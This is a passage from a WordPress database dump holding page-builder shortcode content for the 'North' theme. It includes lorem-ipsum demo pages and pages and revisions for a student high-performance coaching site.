dapibus leo.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Section 2\"][vc_column_text]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row][vc_column width=\"1/1\"][vc_column_text]\n<h1>Callout Box</h1>\n[/vc_column_text][callout_box title=\"WELCOME TO NORTH\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout.\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/1\"][vc_column_text]\n<h1>Progress Bars</h1>\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"90|Development,80|Design,70|Marketing\" bgcolor=\"bar_grey\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"90|Development,80|Design,70|Marketing\" bgcolor=\"bar_grey\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/1\"][vc_column_text]\n<h1>Alerts</h1>\n[/vc_column_text][vc_message color=\"alert-info\" style=\"rounded\"]I am message box. Click edit button to change this text.[/vc_message][vc_message color=\"alert-warning\" style=\"rounded\"]I am message box. Click edit button to change this text.[/vc_message][vc_message color=\"alert-success\" style=\"3d\" css_animation=\"top-to-bottom\"]I am message box. Click edit button to change this text.[/vc_message][/vc_column][/vc_row][vc_row content_width=\"container\"][vc_column width=\"1/1\"][vc_column_text]\n<h1>Animated Factors</h1>\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days\" number=\"100\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Days\" number=\"100\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Days\" number=\"100\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Days\" number=\"100\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_width=\"container\"][vc_column width=\"1/1\"][vc_column_text]\n<h1>SOCIAL BUTTONS</h1>\n[/vc_column_text][social_icons style=\"square\" mail=\"#\" facebook=\"#\" twitter=\"#\" instagram=\"#\" tumblr=\"#\" linkedin=\"#\" youtube=\"#\" vimeo=\"#\" skype=\"#\" flickr=\"#\" dropbox=\"#\" pinterest=\"#\" google_plus=\"#\" dribbble=\"#\" rss=\"#\"][social_icons style=\"round\" mail=\"#\" facebook=\"#\" twitter=\"#\" instagram=\"#\" tumblr=\"#\" linkedin=\"#\" youtube=\"#\" vimeo=\"#\" skype=\"#\" google_plus=\"#\" flickr=\"#\" dropbox=\"#\" pinterest=\"#\" dribbble=\"#\" rss=\"#\"][/vc_column][/vc_row][vc_row content_width=\"container\"][vc_column width=\"1/1\"][vc_column_text]\n<h1>Buttons</h1>\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text][button label=\"Hello\" color=\"accent\" url=\"#\"] [button label=\"Hello\" color=\"green\" url=\"#\"] [button label=\"Hello\" color=\"blue\" url=\"#\"] [button label=\"Hello\" color=\"light-blue\" url=\"#\"] [button label=\"Hello\" color=\"red\" url=\"#\"] [button label=\"Hello\" color=\"orange\" url=\"#\"] [button label=\"Hello\" color=\"white\" url=\"#\"] [button label=\"Hello\" color=\"purple\" url=\"#\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text][button label=\"Large Button\" color=\"accent\" url=\"#\" size=\"large\"] [button label=\"Large Button\" color=\"white\" url=\"#\" size=\"large\"] [button label=\"Default Button\" color=\"accent\" url=\"#\"] [button label=\"Default Button\" color=\"white\" url=\"#\"]\n\n[button label=\"Small Button\" color=\"accent\" url=\"#\" size=\"small\"] [button label=\"Default Button\" color=\"white\" url=\"#\" size=\"small\"] [button label=\"Default Button\" color=\"accent\" url=\"#\" size=\"tiny\"] [button label=\"Default Button\" color=\"white\" url=\"#\" size=\"tiny\"][/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_width=\"container\"][vc_column width=\"1/1\"][vc_column_text]\n<h1>Icon Boxes</h1>\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/3\"][icon_box title=\"Super Responsive\" text=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old.\" link_title=\"More Info\" target=\"_self\" style=\"default\" animated=\"yes\" animation_delay=\"100\" icon=\"fa-picture-o\"][/vc_column_inner][vc_column_inner width=\"1/3\"][icon_box title=\"Super Responsive\" text=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old.\" link_title=\"More Info\" target=\"_self\" style=\"default\" animated=\"yes\" animation_delay=\"100\" icon=\"fa-heart\"][/vc_column_inner][vc_column_inner width=\"1/3\"][icon_box title=\"Super Responsive\" text=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old.\" link_title=\"More Info\" target=\"_self\" style=\"default\" animated=\"yes\" animation_delay=\"100\" icon=\"fa-briefcase\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_width=\"container\"][vc_column width=\"1/1\"][vc_column_text]\n<h2>Custom Slider</h2>\n[/vc_column_text][vc_images_carousel images=\"556,557\" onclick=\"link_image\" custom_links_target=\"_self\" mode=\"horizontal\" speed=\"5000\" slides_per_view=\"1\" img_size=\"full\" captions=\"library\" custom_captions=\"Slide 1 Title|Slide 1 Subtitle,Slide 2 Title|Slide 2 Subtitle\" fullscreen=\"no\"][/vc_column][/vc_row][vc_row content_width=\"container\"][vc_column width=\"1/1\"][vc_column_text]\n<h2>Responsive Video</h2>\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_video link=\"http://vimeo.com/55945051\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_video link=\"https://www.youtube.com/watch?v=mSLAF_DjiDU\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Shortcodes','','publish','open','open','','elements','','','2014-07-03 14:18:59','2014-07-03 14:18:59','',0,'http://localhost/north1/?page_id=255',0,'page','',0),(328,1,'2014-07-07 11:50:20','2014-07-07 11:50:20','[vc_row content_width=\"fullwidth\" css=\".vc_custom_1405493927837{margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][vntd_fullscreen_slider images=\"545,547\" text_static=\"We are North! We love to design. We are happy with you are!\" style=\"style1\" posts_nr=\"6\" button1_label=\"Purchase\" button1_url=\"#\" button2_label=\"Get Started\" button2_url=\"#\" text_dynamic=\"WE ARE CREATIVE DESIGNERS,WE LOVE TO DESIGNING\" animated=\"yes\" bg_overlay=\"dark2\" buttons_color=\"dark\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408422099994{margin-bottom: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/slide71.jpg?id=548) !important;}\" content_width=\"container\" parallax=\"yes\" fullscreen=\"yes\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"fashion\"][vc_column width=\"1/1\"][fancy_text_block style=\"style1\" title=\"FASHION GIRLS\" subtitle=\"Welcome to North! We love to design. We are happy with you are!\" alttitle=\"#01\" text=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor, nisi elit consequat ipsum, nec sagittis sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi per conubia nostra, per inceptos himenaeos. Mauris in erat justo.\" button_label=\"Continue\" button_url=\"#naturel\" plus_url=\"http://veented.com/themes/north/portfolio/dawn/\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405412510138{margin-bottom: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/m-slide21.jpg?id=561) !important;}\" content_width=\"container\" parallax=\"yes\" fullscreen=\"yes\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"naturel\"][vc_column width=\"1/1\"][fancy_text_block style=\"style2\" title=\"LOVE OF NATURE\" subtitle=\"Welcome to North! We love to design. We are happy with you are!\" alttitle=\"#02\" text=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor, nisi elit consequat ipsum, nec sagittis sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi per conubia nostra, per inceptos himenaeos. Mauris in erat justo.\" button_label=\"Continue\" button_url=\"#blues\" plus_url=\"http://veented.com/themes/north/portfolio/forest/\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405412591005{margin-bottom: 0px !important;background-image: url(http://localhost/north1/wp-content/uploads/2014/07/slide8.jpg?id=335) !important;}\" content_width=\"container\" parallax=\"yes\" fullscreen=\"yes\" video=\"k84QxVJd0tI\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"false\" el_id=\"blues\"][vc_column width=\"1/1\"][fancy_text_block style=\"style3\" title=\"Blues on Video\" subtitle=\"Welcome to North! We love to design. We are happy with you are!\" alttitle=\"#03\" text=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor, nisi elit consequat ipsum, nec sagittis sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi per conubia nostra, per inceptos himenaeos. Mauris in erat justo.\" button_label=\"Continue\" button_url=\"#animals\" plus_url=\"http://veented.com/themes/north/portfolio/music/\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408422142417{margin-bottom: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/slide101.jpg?id=551) !important;}\" content_width=\"fullwidth\" parallax=\"yes\" fullscreen=\"yes\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"animals\"][vc_column width=\"1/1\"][vntd_fullscreen_slider text_static=\"Welcome to North! We love to design. We are happy with you are!\" style=\"style1\" posts_nr=\"6\" text_dynamic=\"Best Friend,Pure and Clean\" animated=\"yes\" plus_url=\"http://veented.com/themes/north/portfolio/music/\" bg_overlay=\"dark1\" button1_label=\"Keep in Touch\" button1_url=\"#contact\"][/vc_column][/vc_row][vc_row content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" css=\".vc_custom_1405412637738{margin-bottom: 0px !important;padding-top: 100px !important;padding-bottom: 100px !important;}\" el_id=\"contact\"][vc_column width=\"1/1\"][special_heading title=\"KEEP IN TOUCH\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" animated=\"yes\" margin_bottom=\"0\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408422194164{margin-bottom: 0px !important;padding-top: 100px !important;padding-bottom: 100px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i61.jpg?id=541) !important;}\" color_scheme=\"white\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" bg_overlay=\"dark\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" facebook=\"http://www.facebook.com\" address=\"North, Street Name 6901, Melbourne Australia\" email=\"support@goldeyethemes.com\" twitter=\"#\" youtube=\"#\"][/vc_column][/vc_row]','Home8','','publish','open','closed','','home8','','','2014-07-07 11:50:20','2014-07-07 11:50:20','',0,'http://localhost/north1/?page_id=328',0,'page','',0),(623,1,'2014-06-23 09:20:53','2014-06-23 09:20:53','[vc_row full_height=\"yes\" el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1612191669997{padding-top: 237px !important;padding-bottom: 237px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-80-1.png?id=2142) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column width=\"1/6\"][/vc_column][vc_column width=\"5/6\"][vc_custom_heading text=\"Become ``Real World`` Ready\" font_container=\"tag:h1|font_size:4.5rem|text_align:left|color:%23ffffff|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Your High-Performance Journey Starts Now.\" font_container=\"tag:p|font_size:1.1em|text_align:left|color:%23ffffff|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][vc_empty_space height=\"15px\"][button label=\"Get Started Here\" target=\"_blank\" color=\"custom\" size=\"large\" customcolor=\"#e612a9\" undefined=\"\" url=\"www.samdemma.com\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][vc_custom_heading text=\"You are going to die...\" font_container=\"tag:h2|font_size:4.5rem|text_align:left|color:%23333333|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: left;\"><span style=\"font-weight: 400;\">Like a food product, you have a personal “best before” date.  And before that date, there are memories you want to make, places you want to explore, people you want to meet, and an impact you want to create.  The only way to accomplish this before you expire is to reach your full potential.  <strong>Through the development of six key-traits, we help you max out your potential to live a healthy, happier and more productive life.</strong></span></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2150\" img_size=\"full\" alignment=\"center\" style=\"vc_box_shadow\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://podcasts.apple.com/ca/podcast/high-performing-student/id1450741018\"][vc_column_text]\r\n<h4 style=\"text-align: center;\">The High Performing Student Podcast</h4>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2153\" img_size=\"full\" alignment=\"center\" style=\"vc_box_shadow\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://www.ted.com/talks/sam_demma_small_consistent_actions\"][vc_column_text]\r\n<h4 style=\"text-align: center;\">The TEDx Talk</h4>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2154\" img_size=\"full\" alignment=\"center\" style=\"vc_box_shadow\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://www.youtube.com/channel/UCnouAfzGsC1zvIprQbI9hGg\"][vc_column_text]\r\n<h4 style=\"text-align: center;\">The Youtube Channel</h4>\r\n[/vc_column_text][/vc_column][/vc_row]','Home1','','publish','closed','closed','','home1','','','2021-02-03 01:55:06','2021-02-03 01:55:06','',0,'http://localhost/north1/?page_id=2',0,'page','',0),(2111,1,'2020-11-06 01:30:45','2020-11-06 01:30:45','[vc_row full_height=\"yes\" el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1603899826716{padding-top: 237px !important;padding-bottom: 237px !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column][vc_custom_heading text=\"Become ``Real World`` Ready\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23000000|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Your High-Performance Journey Starts Now.\" font_container=\"tag:p|font_size:1.1em|text_align:center|color:%23000000|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1603899245380{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #333333 !important;}\"][vc_column][logos_carousel images=\"2043,2045,2047,2046,2048\" cols=\"5\" logo_max_height=\"60\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][vc_column_text]<em><span style=\"text-decoration: underline;\"><b>You are going to die.</b></span></em><span style=\"font-weight: 400;\">  Like a food product, you have a personal “best before” date.  And before that date, there are memories you want to make, places you want to explore, people you want to meet, and an impact you want to create.  The only way to accomplish this before you expire, is to reach your full potential.  <strong>Through the development of six key-traits, we help you max out your potential to live a healthy, happier and more productive life.</strong></span>[/vc_column_text][/vc_column][/vc_row]','Home1','','inherit','closed','closed','','623-revision-v1','','','2020-11-06 01:30:45','2020-11-06 01:30:45','',623,'http://highperformingstudent.com/2020/11/06/623-revision-v1/',0,'revision','',0),(2042,1,'2020-10-28 15:32:56','2020-10-28 15:32:56','[vc_row el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1603897511894{padding-top: 237px !important;padding-bottom: 237px !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column][vc_custom_heading text=\"Leadership starts with you\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23000000|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Helping students build better habits, communicate more effectively, and become better leaders.\" font_container=\"tag:p|font_size:1.1em|text_align:center|color:%23000000|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1603898590928{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #131313 !important;}\"][vc_column][logos_carousel images=\"2041,2040,2039,2038\" cols=\"5\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][special_heading title=\"About North\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" margin_bottom=\"65\" text_align=\"center\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"300\" text_style=\"fullwidth\" icon=\"fa-desktop\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"500\" text_style=\"fullwidth\" icon=\"fa-comments-o\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"700\" text_style=\"fullwidth\" icon=\"fa-life-ring\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"900\" text_style=\"fullwidth\" icon=\"fa-flask\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"what-we-do\" color_scheme=\"white\" bg_overlay=\"dark\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" darken=\"dark\"][vc_column][special_heading title=\"What we do\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" margin_bottom=\"0\" text_align=\"center\" color=\"white\"][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\r\n<h1>PARALLAX WITH DEGRADE</h1>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\r\n\r\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\r\n\r\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\r\n\r\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\r\n\r\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[/list]\r\n\r\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\r\n\r\n[button label=\"Read More\" url=\"#facts\" color=\"black\" scroll=\"yes\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" img_size=\"full\" alignment=\"right\" css_animation=\"right-to-left\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column][special_heading title=\"WHAT OUR FUN FACTORS\" margin_bottom=\"0\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"works\" css=\".vc_custom_1406483332545{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\"][vc_column][special_heading title=\"Our Portfolio\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\" animated=\"no\" margin_bottom=\"0\" color=\"dark\"][portfolio_grid cats=\"branding,design,photography,video\" posts_nr=\"9\" more_url=\"http://veented.com/themes/north/portfolio/\" style=\"default\" paged_posts=\"no\" thumb_style=\"alt\" fullwidth=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column][special_heading title=\"Our Creative Team\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" animated=\"no\" margin_bottom=\"0\" color=\"dark\"][team_carousel][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"white\" bg_overlay=\"dark\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" darken=\"dark\"][vc_column][special_heading title=\"Features With Mobile\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709610245{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][/vc_column][/vc_row][vc_row parallax=\"yes\" bg_overlay=\"dark\" css=\".vc_custom_1410480231107{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\"][vc_column][testimonials posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column][special_heading title=\"What Clients Says\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\" color=\"dark\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\" color=\"dark\"][/vc_column][/vc_row][vc_row el_id=\"what-we\" css=\".vc_custom_1409759211052{padding-bottom: 80px !important;}\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable 